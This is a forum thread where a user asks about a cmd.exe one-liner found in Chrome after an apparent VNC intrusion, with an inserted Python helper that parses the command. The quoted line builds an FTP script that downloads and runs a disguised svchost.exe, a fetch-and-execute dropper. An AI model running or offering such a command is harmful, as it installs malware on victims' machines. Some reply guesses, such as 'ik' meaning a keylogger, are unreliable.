Google Chrome

Robert Munch

Senior member
Can someone explain this? I found this on my home desktop computer in Google Chrome when I stepped away from my computer for a few hours. Was my computer hacked somehow, and how could this have occurred?

systemroot%\system32\cmd.exe cmd /c echo open 127.0.0.1 21 >> ik &echo user owned suckdicky >> ik &echo binari >> ik &echo get svchost.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &svchost.exe &exit

No cmd box prompt occurred; this was in my Google Chrome Google search bar as a "result". I live by myself, so nobody did this as a prank while I was away.
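
Added example, not part of any post in this thread: a small Python triage helper that splits the one-liner posted above on "&", rebuilds the FTP script that the echo steps append to the file "ik", and reports what is fetched, deleted and run. The function name and report fields are hypothetical; the sample input is the command as posted.

```python
import re

# Sample input: the command line exactly as posted in this thread.
SAMPLE = (r'systemroot%\system32\cmd.exe cmd /c echo open 127.0.0.1 21 >> ik '
          r'&echo user owned suckdicky >> ik &echo binari >> ik '
          r'&echo get svchost.exe >> ik &echo bye >> ik '
          r'&ftp -n -v -s:ik &del ik &svchost.exe &exit')

ECHO_APPEND = re.compile(r'^echo\s+(.*?)\s*>>\s*(\S+)$', re.I)  # echo TEXT >> FILE
FTP_SCRIPT = re.compile(r'^ftp\b.*?-s:(\S+)', re.I)             # ftp ... -s:FILE

def triage(cmdline):
    """Summarise a cmd.exe one-liner that builds and runs an FTP script."""
    # Strip everything up to and including the "cmd /c" wrapper.
    body = re.sub(r'^.*?\bcmd(\.exe)?\s+/c\s+', '', cmdline.strip(), flags=re.I)
    written = {}  # file name -> lines appended to it by echo
    report = {'ftp_script': None, 'script_lines': [], 'server': None,
              'downloaded': [], 'deleted': [], 'executed': []}
    for step in (s.strip() for s in body.split('&')):
        if not step or step.lower() == 'exit':
            continue
        m = ECHO_APPEND.match(step)
        if m:
            written.setdefault(m.group(2), []).append(m.group(1))
            continue
        m = FTP_SCRIPT.match(step)
        if m:
            report['ftp_script'] = m.group(1)
            report['script_lines'] = list(written.get(m.group(1), []))
        elif step.lower().startswith('del '):
            report['deleted'].append(step[4:].strip())
        else:
            report['executed'].append(step)  # any other step is a command being run
    for line in report['script_lines']:
        words = line.split()
        if not words:
            continue
        if words[0].lower() == 'open' and len(words) >= 2:
            report['server'] = (words[1], words[2] if len(words) > 2 else '21')
        elif words[0].lower() == 'get' and len(words) >= 2:
            report['downloaded'].append(words[1])
    # Highest-signal finding: a file fetched over FTP is then executed.
    report['runs_download'] = any(
        e.split()[0].lower() in (d.lower() for d in report['downloaded'])
        for e in report['executed'])
    return report

if __name__ == '__main__':
    for key, value in triage(SAMPLE).items():
        print(f'{key}: {value}')
```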
 
Last edited:
Here's a year-old thread nearly identical to yours:

http://ubuntuforums.org/archive/index.php/t-1244618.html

If it was my computer, I'd rebuild it from scratch or restore it from image backups. And I'd be sure that any remote access software was protected with a very long password, that there's a router between the Internet and the PC, and be very careful about any software that gets run or installed.

"IK" is likely a keylogger program. It stands for "invisible keylogger". It looks like it's being used here to remotely type ftp commands.

No cmd box prompt occurred; this was in my Google Chrome Google search bar as a "result".
A quick check and it seems that some commands can be run from the Chrome address bar. I don't know how extensive this is or if other browsers can do this.
 
Last edited:
From what I understand it seems the invader tried to delete my svchost.exe as it was referencing 127.0.0.1 21. I was also DMZ'd during this time with TightVNC running. When I relaunched VNC I noticed the admin password was removed including the login password to access the machine. Some sort of brute force attack maybe.

I'm not sure if in fact this file is removed, and I'm running on Win7 if that makes a difference. I tried to check the vncviewer.log and noticed it was at 0kb with it enabled. I've had it running for the past few days. I'm not sure how to locate an IP address from this attack.

Found another interesting article http://www.hellboundhackers.org/forum/a_bothuman_tryed_connecting_to_my_vncserver-14-11285_0.html regarding these types of attacks.
 
Last edited:
Back
Top